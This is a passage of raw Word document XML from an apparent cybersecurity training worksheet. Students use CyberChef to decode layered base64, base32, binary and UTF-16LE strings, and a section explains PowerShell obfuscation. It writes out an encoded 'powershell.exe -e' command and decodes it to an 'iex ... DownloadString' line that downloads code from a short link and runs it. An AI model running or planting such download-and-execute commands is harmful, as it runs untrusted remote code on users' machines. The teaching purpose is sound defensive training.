          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="0099777E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0099777E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>What%20did%20the%20buffalo%20say%20to%20his%20son%20when%20he%20dropped%20him%20off%20at%20school?%20Bison!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C44E792" w14:textId="25952AF0" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Decoded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27670BEE" w14:textId="77777777" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF537B1" w14:textId="4EDE745E" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidRPr="0099777E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0099777E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>V2h5JTIwZGlkJTIwdGhlJTIwYmljeWNsZSUyMGZhbGwlMjBvdmVyPyUyMEJlY2F1c2UlMjBpdCUyMHdhcyUyMHR3by10aXJlZCE=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2721A9D3" w14:textId="02EDFE7C" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Decoded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669C1B0C" w14:textId="77777777" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58CE65F8" w14:textId="4E9D5CA5" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="0099777E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0099777E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>VjJoaGRDZHpJR0VnWTI5dGNIVjBaWEluY3lCbVlYWnZjbWwwWlNCemJtRmphejhnVFdsamNtOWphR2x3Y3lFPQ==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156A3559" w14:textId="06F1EC91" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(HINT: encoding can have multiple iterations…once, twice, or more!...try multiples of one in your RECIPE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362B0AEF" w14:textId="0BC457CA" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Decoded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7439B963" w14:textId="77777777" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171F96ED" w14:textId="5708BF9F" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Alright now that you’re getting the hang of it…let’s try three more challenging ones here.  These ones will require two or more steps for </w:t>
      </w:r>
      <w:r w:rsidR="003222B4">
        <w:t>each.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369DE341" w14:textId="7FE78352" w:rsidR="003222B4" w:rsidRDefault="003222B4" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidRPr="003222B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003222B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>VTFOQ00ySXlOV3RhV0Vwc1drTkNNMkZJYTJka1IyaHNTVWRhZVdGWVRtbGFWMVU5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4957FD0B" w14:textId="55C13D3C" w:rsidR="003222B4" w:rsidRDefault="003222B4" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Hint: 3 steps and remember the = isn’t always at the end of base64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B56D9B" w14:textId="3C49E8B8" w:rsidR="003222B4" w:rsidRDefault="003222B4" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Decoded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780DA528" w14:textId="77777777" w:rsidR="003222B4" w:rsidRDefault="003222B4" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01CE43D5" w14:textId="3FED8822" w:rsidR="003222B4" w:rsidRDefault="003222B4" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidRPr="003222B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003222B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>01001111 00110101 01010001 01011000 01000111 01001010 01001010 01010011 01000111 01000010 01010100 01010111 01001011 00110101 01000100 01010101 01001110 01000110 01011000 01000111 01001111 01001010 01001010 01010011 01000111 01000010 01010010 01000111 01010011 01011010 00110011 01001000 01001101 01010110 01011010 01000011 01001011 01001101 01010010 01010001 01001101 01000110 01011000 01000111 01001001 01001010 01001010 01010011 01000111 01000010 01010010 01000111 01010011 01011010 00110011 01001000 01001101 01010110 01011010 01000001 00111101 00111101 00111101 00111101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C87E4E9" w14:textId="59D27737" w:rsidR="003222B4" w:rsidRDefault="003222B4" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Hint 3 steps…and base 32 is another operation…)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D8779A" w14:textId="476861D4" w:rsidR="00032C1B" w:rsidRDefault="00032C1B" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Decoded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA4387F" w14:textId="77777777" w:rsidR="00032C1B" w:rsidRDefault="00032C1B" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C1F687A" w14:textId="3BF80A01" w:rsidR="00032C1B" w:rsidRDefault="003222B4" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidRPr="003222B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00032C1B" w:rsidRPr="00032C1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>VABoAGUAbgAgAGkAdAAgAEgASQBUACAATQBFACEAIQA=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44379583" w14:textId="0EBBEF67" w:rsidR="003222B4" w:rsidRPr="003222B4" w:rsidRDefault="003222B4" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">(Hint 2 steps…and UTF-16LE (try the Decode Text operation) likes to l.o.o.k. .l.i.k.e. .t.h.i.s. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3050D945" w14:textId="4C7AA6D1" w:rsidR="00032C1B" w:rsidRDefault="00032C1B" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Decoded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A473352" w14:textId="77777777" w:rsidR="00032C1B" w:rsidRDefault="00032C1B" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B2276A" w14:textId="51F45986" w:rsidR="00032C1B" w:rsidRDefault="00032C1B" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exercise 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE31805" w14:textId="3B1B43DC" w:rsidR="00032C1B" w:rsidRDefault="00032C1B" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00BA3CA3">
        <w:t>One of the ways that malicious actors like to hide their steps and bypass anti-virus/anti-malware is to multiple layers of encoding to help hide their true meaning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B47613B" w14:textId="77777777" w:rsidR="00BA3CA3" w:rsidRPr="00BA3CA3" w:rsidRDefault="00BA3CA3" w:rsidP="00BA3CA3">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA3CA3">
        <w:t>PowerShell obfuscation refers to the technique of deliberately making PowerShell code more complex and difficult to understand or analyze. Obfuscation involves modifying the structure, syntax, and naming conventions of the code, making it challenging for security researchers, antivirus software, or other analysis tools to identify and comprehend the script's intent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C69E069" w14:textId="77777777" w:rsidR="00BA3CA3" w:rsidRDefault="00BA3CA3" w:rsidP="00BA3CA3">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA3CA3">
        <w:lastRenderedPageBreak/>
        <w:t>Obfuscation, in the context of cybersecurity, is the process of intentionally obscuring the true purpose or functionality of code, making it harder to decipher or reverse engineer. Malicious actors employ obfuscation techniques to evade detection, hinder analysis, and increase the chances of successful execution of their malicious activities. By obfuscating their PowerShell code, attackers can camouflage their intentions, bypass security controls, and increase the effectiveness of their attacks. This technique makes it difficult for defenders to identify and mitigate threats, as the obfuscated code can evade traditional signature-based detection methods and hinder analysis by automated tools. Ultimately, obfuscation is used by malicious actors to enhance the stealth, persistence, and success rates of their cyberattacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3623AAD0" w14:textId="69CC48BE" w:rsidR="00BA3CA3" w:rsidRDefault="00BA3CA3" w:rsidP="00BA3CA3">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Let’s </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>take a look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> at this Powershell command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3733D316" w14:textId="5AE6513C" w:rsidR="00BA3CA3" w:rsidRDefault="00BA3CA3" w:rsidP="00BA3CA3">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA3CA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>powershell.exe -e aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBpAHQALgBsAHkALwBlADAATQB3ADkAdwAiACkA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08110DD9" w14:textId="010E71B7" w:rsidR="00BA3CA3" w:rsidRPr="00BA3CA3" w:rsidRDefault="00BA3CA3" w:rsidP="00BA3CA3">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>Sure looks like a lot of nothing…but if you try running it in a Powershell prompt…it seems to run something:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BA3CA3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="222D2252" wp14:editId="376F0D79">
            <wp:extent cx="5828665" cy="3312795"/>
            <wp:effectExtent l="0" t="0" r="635" b="1905"/>
            <wp:docPr id="179339833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8333" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5828665" cy="3312795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC248E2" w14:textId="68A00D54" w:rsidR="00BA3CA3" w:rsidRDefault="00BA3CA3" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>But how does it do that?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB95183" w14:textId="77777777" w:rsidR="00BA3CA3" w:rsidRDefault="00BA3CA3" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E0F9171" w14:textId="495A53D8" w:rsidR="00BA3CA3" w:rsidRDefault="00BA3CA3" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Let’s breakdown this Powershell One-liner: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716EF024" w14:textId="570A96AB" w:rsidR="00FC78E2" w:rsidRDefault="00FC78E2" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Powershell.exe </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Calls on powershell to execute whatever cmdlet’s follow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41549CD9" w14:textId="254FBBBF" w:rsidR="00FC78E2" w:rsidRDefault="00FC78E2" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">-e </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> specifies that the following is “encoded”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BD84AE" w14:textId="1D15A112" w:rsidR="00FC78E2" w:rsidRDefault="00FC78E2" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC78E2">
        <w:t>aQBlAHgAIAA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">…CkA </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> long block of encoded text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288780C3" w14:textId="77777777" w:rsidR="00FC78E2" w:rsidRDefault="00FC78E2" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD19EFF" w14:textId="2DF70102" w:rsidR="00FC78E2" w:rsidRDefault="00FC78E2" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Let’s see if there’s anything that we can do to decode that block of text using CyberChef.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DB1C1C" w14:textId="0AD01A37" w:rsidR="00FC78E2" w:rsidRDefault="00FC78E2" w:rsidP="00FC78E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA3CA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBpAHQALgBsAHkALwBlADAATQB3ADkAdwAiACkA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554685AF" w14:textId="73B91FFC" w:rsidR="00FC78E2" w:rsidRDefault="00FC78E2" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="360" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Decoded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5621B1" w14:textId="77777777" w:rsidR="00FC78E2" w:rsidRDefault="00FC78E2" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="360" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="533E7B09" w14:textId="6178FB55" w:rsidR="00FC78E2" w:rsidRDefault="00FC78E2" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="360" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now let’s put that whole command together: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E06D562" w14:textId="6FB2EC43" w:rsidR="00FC78E2" w:rsidRDefault="00FC78E2" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="360" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Powershell.exe -e </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC78E2">
        <w:t>iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">A little easier to understand what is going on now to a cybersecurity analyst.  The “iex” tells the computer to invoke the expression following it, which in this case is the New-Object cmdlet calling on the internet web client to download the payload from the site </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00AE4C51">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://bit.ly/e0Mw9w</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.  This code is then executed…resulting in a hilarious result. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3498D338" w14:textId="40B91E88" w:rsidR="00FC78E2" w:rsidRDefault="00FC78E2" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43CDDB08" w14:textId="626E7EF0" w:rsidR="00FC78E2" w:rsidRDefault="00FC78E2" w:rsidP="00FC78E2">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exercise 4 (last one):</w:t>
      </w:r>
    </w:p>
